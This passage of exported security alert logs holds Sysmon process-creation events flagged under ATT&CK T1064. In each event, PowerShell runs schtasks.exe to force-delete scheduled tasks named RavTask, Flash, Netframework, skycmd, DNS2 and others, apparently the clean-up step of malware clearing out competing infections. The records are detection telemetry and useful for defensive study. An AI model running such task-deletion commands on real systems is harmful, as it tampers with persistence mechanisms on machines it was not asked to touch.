/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.359482400Z"",""eventRecordID"":""2243"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.355\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010b1f21900}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.355"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010b1f21900}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.678",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.329 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001021f11900} +ProcessId: 7224 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.332275900Z"",""eventRecordID"":""2242"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.329\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001021f11900}\r\nProcessId: 7224\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.329"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001021f11900}"",""processId"":""7224"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.306 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001054ef1900} +ProcessId: 7172 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.308373800Z"",""eventRecordID"":""2241"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.306\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001054ef1900}\r\nProcessId: 7172\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.306"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001054ef1900}"",""processId"":""7172"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.604",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.283 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c5ed1900} +ProcessId: 6460 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.286492800Z"",""eventRecordID"":""2240"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.283\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c5ed1900}\r\nProcessId: 6460\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.283"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010c5ed1900}"",""processId"":""6460"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.545",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.258 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001035ec1900} +ProcessId: 6452 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.261336500Z"",""eventRecordID"":""2239"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.258\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001035ec1900}\r\nProcessId: 6452\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.258"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001035ec1900}"",""processId"":""6452"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.480",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.233 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a6ea1900} +ProcessId: 1948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.236294600Z"",""eventRecordID"":""2238"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.233\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a6ea1900}\r\nProcessId: 1948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.233"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010a6ea1900}"",""processId"":""1948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.465",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.208 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001016e91900} +ProcessId: 4384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.211176700Z"",""eventRecordID"":""2237"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.208\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001016e91900}\r\nProcessId: 4384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 